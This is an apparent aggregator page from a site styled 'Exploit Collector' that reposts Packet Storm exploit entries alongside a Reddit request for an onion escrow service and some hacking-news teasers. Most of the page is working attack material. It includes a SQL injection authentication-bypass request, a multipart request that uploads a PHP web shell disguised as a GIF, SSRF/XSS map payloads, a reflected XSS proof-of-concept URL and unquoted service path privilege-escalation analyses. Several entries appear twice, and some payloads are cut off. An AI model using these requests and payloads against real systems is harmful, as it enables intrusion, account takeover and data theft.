hacking: security in practice
Escrow
Can anyone suggest to me an onion escrow service, please?
submitted by /u/yellow-sugar
[link] [comments]
Escrow
Can anyone suggest to me an onion escrow service, please?
submitted by /u/yellow-sugar
[link] [comments]
reddit
Escrow
Can anyone suggest to me an onion escrow service, please?
Hacking Articles Tips Tricks Videos Tutorials
Photo
Dark Reading: Attacks/Breaches
Data Protection Is a Group Effort
When every employee is well-versed in customer data privacy principles, the DPO knows the enterprise's sensitive data is in good hands.
Data Protection Is a Group Effort
When every employee is well-versed in customer data privacy principles, the DPO knows the enterprise's sensitive data is in good hands.
Exploit Collector
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting
https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
WordPress Mapplic-Lite plugin version 1.0 suffers from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.
MD5 |
Download
Source:packetstormsecurity.com
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting
https://1.bp.blogspot.com/-luFAqsulr64/WWlvFAfKXLI/AAAAAAAAILI/M2y6qJlcju8Kpq9V68KpSF2h6FJoaSeWACLcBGAs/s1600/h135.png
WordPress Mapplic-Lite plugin version 1.0 suffers from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.
MD5 |
8713ec5c90e3494732055a63d7db0c05Download
#Title : Mapplic-Lite Wordpress Plugins Stored XSS Injection via SSRF
#Date : 22/03/2021
#Author : Eagle Eye
#Download : https://wordpress.org/plugins/mapplic-lite/
#Vendor Homepage : https://mapplic.com/
#Version Affected : Version 1.0
#Tested on : Google Chrome
#XSS Vuln from add/edit Map and bypass with host raw.githubusercontent.com
#1.Login as user
#2.Add Add/Edit Map
- [From Add]Enter github url with payload at "Map File (required)"
- [From Edit]Click raw and enter github url with payload
#Example [From edit]
{"mapwidth":"100","mapheight":"100","minimap":false,"clearbutton":true,"zoombuttons":true,"sidebar":false,
"search":false,"hovertip":true,"mousewheel":true,"fullscreen":false,"deeplinking":true,"mapfill":false,
"zoom":true,"alphabetic":false,"zoomlimit":"3","action":"tooltip","categories":[],
"levels":[{"id":"my-map","title":"My Map","map":"
https://raw.githubusercontent.com/Aizat197/xss_test/main/xss.svg
","minimap":"","locations":[]}]}
#Payload
<svg
xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"
y="0px" width="960px" height="600px" viewBox="0 0 960 600"
enable-background="new 0 0 960 600" xml:space="preserve">
Source:packetstormsecurity.com
Kitploit
WordPress Mapplic-Lite 1.0 SSRF / Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
ELAN Touchpad version 15.2.13.1_X64_WHQL suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path
https://2.bp.blogspot.com/-LETyKySuDgQ/WWlvb4o-z5I/AAAAAAAAIPU/5gCHtKhwhLoet_fHEL-XnPuLlDk7q9atQCLcBGAs/s1600/h76.png
ELAN Touchpad version 15.2.13.1_X64_WHQL suffers from an unquoted service path vulnerability.
MD5 |
b1190def32e41002204b0b182bd559edDownload
# Exploit Title: ELAN Touchpad 15.2.13.1_X64_WHQL - 'ETDService' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-22
# Vendor : ELAN Microelectronics
# Version : ELAN Touchpad 15.2.13.1_X64_WHQL
# Vendor Homepage : http://www.emc.com.tw/
# Tested on OS: Windows 8
#This software installs EDTService.exe, version 11.10.2.1
#Analyze PoC :
==============
C:\>sc qc ETDService
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ETDService
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Elantech\ETDService.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Elan Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
Source:packetstormsecurity.com
Kitploit
ELAN Touchpad 15.2.13.1_X64_WHQL Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Online Reviewer Management System 1.0 Shell Upload
https://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png
Online Reviewer Management System version 1.0 suffers from a remote shell upload vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Online Reviewer Management System 1.0 Shell Upload
https://3.bp.blogspot.com/-3DxkerR7uq4/WWlu9h9UGfI/AAAAAAAAIJw/dRDCcwrw3XEGYQWUo-AXJEEU7FQ8iTgpACLcBGAs/s1600/h115.png
Online Reviewer Management System version 1.0 suffers from a remote shell upload vulnerability.
MD5 |
9d3b419524c9b1d3f62ecd6becf032baDownload
# Exploit Title: Online Reviewer Management System Shell Upload
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10
@attack request
POST /admins/assessments/databank/btn_functions.php?action=add HTTP/1.1
Host: reviewmngmnt.olly
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------28762627066859903521570508233
Content-Length: 1574
Origin: http://reviewmngmnt.olly
Connection: close
Referer: http://reviewmngmnt.olly/admins/assessments/databank/index.php
Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi
Upgrade-Insecure-Requests: 1
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="difficulty_id"
1
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="test_desc"
Agriculture
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="test_subject"
Animal Science
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="description"
y8
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="option_a"
y8
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="option_b"
y8
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="option_c"
y8
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="option_d"
y8
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="answer"
A
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="personImage"; filename="y8.gif.php.php"
Content-Type: application/octet-stream
GIF89a;
tested with b374k.php
?>
-----------------------------28762627066859903521570508233
Content-Disposition: form-data; name="btnAddQuestion"
Save
-----------------------------28762627066859903521570508233--
Source:packetstormsecurity.com
Kitploit
Online Reviewer Management System 1.0 Shell Upload
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
ActivIdentity 8.2 Unquoted Service Path
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
ActivIdentity version 8.2 suffers from an unquoted service path vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
ActivIdentity 8.2 Unquoted Service Path
https://3.bp.blogspot.com/-DuI_c3FaBwQ/WWlvaHZ97uI/AAAAAAAAIO8/N3071iSnuSkvxUt6NQQ_hoJeYx39DTurQCLcBGAs/s1600/h61.png
ActivIdentity version 8.2 suffers from an unquoted service path vulnerability.
MD5 |
be881a342b05db97805bd7ed970cc9f8Download
# Exploit Title: ActivIdentity 8.2 - 'ac.sharedstore' Unquoted Service Path
# Exploit Author : SamAlucard
# Exploit Date: 2021-03-21
# Software Version : ActivIdentity 8.2
# Vendor Homepage : https://www.hidglobal.com/
# Tested on OS: Windows 7 Pro
# ActivIdentity was Acquired by HID Global in Octuber 2010
#ActivClient is a desktop authentication software that uses smarts cards and readers
# for enterprise, government and commercial establishments
#Analyze PoC :
==============
C:\Users\DSAdsi>sc qc ac.sharedstore
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: ac.sharedstore
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Common
Files\ActivIdentity\ac.sharedstore.exe
GRUPO_ORDEN_CARGA : SmartCardGroup
ETIQUETA : 0
NOMBRE_MOSTRAR : ActivIdentity Shared Store Service
DEPENDENCIAS : RPCSS
NOMBRE_INICIO_SERVICIO: LocalSystem
Source:packetstormsecurity.com
Kitploit
ActivIdentity 8.2 Unquoted Service Path
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Online Reviewer Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Online Reviewer Management System version 1.0 remote SQL injection exploit that allows for authentication bypass.
MD5 |
Download
Source:packetstormsecurity.com
Online Reviewer Management System 1.0 SQL Injection
https://4.bp.blogspot.com/-f53oTn8LDZ0/WWlvMw9CK1I/AAAAAAAAIMU/jEtmPtbvTXsSkP0BJUzx6KZQIUlovIO9gCLcBGAs/s1600/h20.png
Online Reviewer Management System version 1.0 remote SQL injection exploit that allows for authentication bypass.
MD5 |
4d991079bac378d19772c72a1fd43234Download
# Exploit Title: Online Reviewer Management System Authentication ByPass
# Exploit Author: th3d1gger
# Vendor Homepage: https://sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/reviewer_0.zip
# Version: 1.0
# Tested on Windows 10
#Vulnerable Source Code
#index.php
if(isset($_REQUEST['btn-login'])){
$username = $_REQUEST['username'];
$password = $_REQUEST['password'];
$user_retrieve = $conn -> prepare("SELECT * FROM users where username = '$username' and password = '$password'");
$user_retrieve->execute();
if($user_retrieve->rowCount() > 0){
while ($row = $user_retrieve->fetch()) {
$_SESSION['usertype_id'] = $row['usertype_id'];
$_SESSION['user_id'] = $row['user_id'];
$_SESSION['firstname'] = $row['fname'];
$_SESSION['middlename'] = $row['mname'];
$_SESSION['lastname'] = $row['lname'];
$_SESSION['course'] = $row['course'];
$usertype_id = $_SESSION['usertype_id'];
if($usertype_id == 3){
echo "";
}
elseif ($usertype_id == 1 || $usertype_id == 2 ) {
echo "";
}
}
}
#Attack Request
POST / HTTP/1.1
Host: reviewmngmnt.olly
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: http://reviewmngmnt.olly/
Connection: close
Referer: http://reviewmngmnt.olly/
Cookie: PHPSESSID=3he3in87240vbdqshdfu75b7qi
Upgrade-Insecure-Requests: 1
username=%27+or+%271%27%3D%271&password=%27+or+%271%27%3D%271&btn-login=Log+In
Source:packetstormsecurity.com
Kitploit
Online Reviewer Management System 1.0 SQL Injection
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
WordPress Mapplic 6.1 SSRF / Cross Site Scripting
https://3.bp.blogspot.com/-SgyDIXUTMbc/WWlu_miSAcI/AAAAAAAAIKE/fKFdSswhFNIqExJ_09QJseTEI_nz_ynRACLcBGAs/s1600/h119.png
WordPress Mapplic plugin versions 6.1 and below suffer from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.
MD5 |
Download
Source:packetstormsecurity.com
WordPress Mapplic 6.1 SSRF / Cross Site Scripting
https://3.bp.blogspot.com/-SgyDIXUTMbc/WWlu_miSAcI/AAAAAAAAIKE/fKFdSswhFNIqExJ_09QJseTEI_nz_ynRACLcBGAs/s1600/h119.png
WordPress Mapplic plugin versions 6.1 and below suffer from a server-side request forgery vulnerability that can be leveraged to commit cross site scripting attacks.
MD5 |
ac14ee13b09af933b71a33cae68c32efDownload
#Title : Mapplic Wordpress Plugins Stored XSS Injection via SSRF
#Date : 22/03/2021
#Author : Eagle Eye
#Vendor Homepage : https://mapplic.com/
#Version Affected : 6.1 and below
#Tested on : Google Chrome
#XSS Vuln from add/edit Map and bypass with host raw.githubusercontent.com
#1.Login as user
#2.Add Add/Edit Map
- [From Add]Enter github url with payload at "Map File (required)"
- [From Edit]Click raw and enter github url with payload
#Example [From edit]
{"mapwidth":"100","mapheight":"100","minimap":false,"clearbutton":true,"zoombuttons":true,"sidebar":false,
"search":false,"hovertip":true,"mousewheel":true,"fullscreen":false,"deeplinking":true,"mapfill":false,
"zoom":true,"alphabetic":false,"zoomlimit":"3","action":"tooltip","categories":[],
"levels":[{"id":"my-map","title":"My Map","map":"
https://raw.githubusercontent.com/Aizat197/xss_test/main/xss.svg
","minimap":"","locations":[]}]}
#Payload
<svg
xmlns:xlink="http://www.w3.org/1999/xlink" x="0px"
y="0px" width="960px" height="600px" viewBox="0 0 960 600"
enable-background="new 0 0 960 600" xml:space="preserve">
Source:packetstormsecurity.com
Kitploit
WordPress Mapplic 6.1 SSRF / Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
WordPress GiveWP 2.9.7 Cross Site Scripting
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
WordPress GiveWP plugin version 2.9.7 suffers from a cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
WordPress GiveWP 2.9.7 Cross Site Scripting
https://3.bp.blogspot.com/-D2NV3HnXxpM/WWlu9YoBNhI/AAAAAAAAIJs/rLrqFdeLLWYSGUQPyN0O7DuhnXu7T_FjQCLcBGAs/s1600/h114.png
WordPress GiveWP plugin version 2.9.7 suffers from a cross site scripting vulnerability.
MD5 |
e1d2d3f9920ae4f2a8d888e6f91a3b5eDownload
# Exploit Title: GiveWP 2.9.7 Reflected Cross-Site Scripting
# Date: 3/23/2021
# Exploit Author: Austin Bentley
# Vendor Homepage: https://givewp.com/
# Software Link: https://wordpress.org/plugins/give/
# Version: 2.9.7
# Tested on: Windows 7
# CVE: CVE-2021-24213
Exploitation requirements: Admin must visit payload URL. Default config.
Tested on: GiveWP 2.9.7, Wordpress 5.7, XAMPP 7.4.16, Firefox 86.0.1. Default configs on all products.
Vulnerable since: 2.4.0, Jan 16th 2019, commit 097c4d0ab964493776950381ed64498040395f6b
Active Installations: 100,000+ per https://wordpress.org/plugins/give/
Researcher: Austin Bentley (https://bentl.ee/)
Detailed writeup available at httpS://bentl.ee/posts/cve-givewp/
PoC URL:
http://localhost/wp-admin/edit.php?s=%22%3E&start-date&end-date&form_id=0&action=-1&paged=1&give_action=delete_bulk_donor&orderby=id&order=DESC&action2=-1&post_type=give_forms&page=give-donors&view=donors
Response:
--- SNIP ---
">
--- SNIP ---
Disclosure Log:
3/21/2021 -- Emailed GiveWP for security contact information
3/22/2021 -- WPScan CNA issued CVE-2021-24213 (un-released)
3/22/2021 -- Provided vendor with PoC
3/22/2021 -- Vendor provided fix in 2.10.0
3/23/2021 -- Fix validated, article posted, CVE unlocked
Source:packetstormsecurity.com
Kitploit
WordPress GiveWP 2.9.7 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Exploit Collector
Hotel And Lodge Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
Hotel And Lodge Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
Download
Source:packetstormsecurity.com
Hotel And Lodge Management System 1.0 Cross Site Scripting
https://4.bp.blogspot.com/-INMz00VTlDg/WWlvPzJvf6I/AAAAAAAAIM4/tZDwU9OuM_wuiTGIuyom6E8lddjUI2D5ACLcBGAs/s1600/h29.png
Hotel And Lodge Management System version 1.0 suffers from a persistent cross site scripting vulnerability.
MD5 |
12607984bffdb3f965f7fdd61ed0ae52Download
# Exploit Title: Hotel And Lodge Management System 1.0 - 'Customer Details' Stored XSS
# Exploit Author: Jitendra Kumar Tripathi
# Vendor Homepage: https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=13707&title=Hotel+and+Lodge+Management+System+using+PHP+with+Source+Code
# Version: 1
# Tested on Windows 10 + Xampp 8.0.3
XSS IMPACT:
1: Steal the cookie
2: User redirection to a malicious website
Vulnerable Parameters: Customer Details
*Steps to reproduce:*
1: Log in with a valid username and password. Navigate to the Customer Details (http://localhost/hotel/source%20code/index.php) on the left-hand side.
2: Add the new customer and then add the payload in Customer Name parameter and click on save button. Post Saved successfully.
3: Now, XSS will get stored and trigger every time when you click view customer and the attacker can steal authenticated users' cookies.
Source:packetstormsecurity.com
Kitploit
Hotel And Lodge Management System 1.0 Cross Site Scripting
Exploit Collector is the ultimate collection of public exploits and exploitable vulnerabilities. Remote/Local Exploits, Shellcode and 0days.
Hacking Articles Tips Tricks Videos Tutorials
1*3aYX-PbckoIohBWrz8tJfw.gif
Hacking on Medium
HOW TO HACK ANY PHONE WITH ONLY PHONE NUMBER, IS IT POSSIBLE?
https://cdn-images-1.medium.com/max/640/1*3aYX-PbckoIohBWrz8tJfw.gif
HOW TO HACK ANY PHONE WITH ONLY PHONE NUMBER, IS IT POSSIBLE?
Continue reading on Medium »
HOW TO HACK ANY PHONE WITH ONLY PHONE NUMBER, IS IT POSSIBLE?
https://cdn-images-1.medium.com/max/640/1*3aYX-PbckoIohBWrz8tJfw.gif
HOW TO HACK ANY PHONE WITH ONLY PHONE NUMBER, IS IT POSSIBLE?
Continue reading on Medium »
Hacking Articles Tips Tricks Videos Tutorials
Photo
Hacking on Medium
El fabricante de servidores de alta disponibilidad Stratus es afectado por ransomware.
https://cdn-images-1.medium.com/max/1498/0*OslaPyQJ8Kr3IFru
Stratus Technologies ha sufrido un ataque de ransomware que requirió que los sistemas se desconectaran para evitar la propagación del…
Continue reading on Medium »
El fabricante de servidores de alta disponibilidad Stratus es afectado por ransomware.
https://cdn-images-1.medium.com/max/1498/0*OslaPyQJ8Kr3IFru
Stratus Technologies ha sufrido un ataque de ransomware que requirió que los sistemas se desconectaran para evitar la propagación del…
Continue reading on Medium »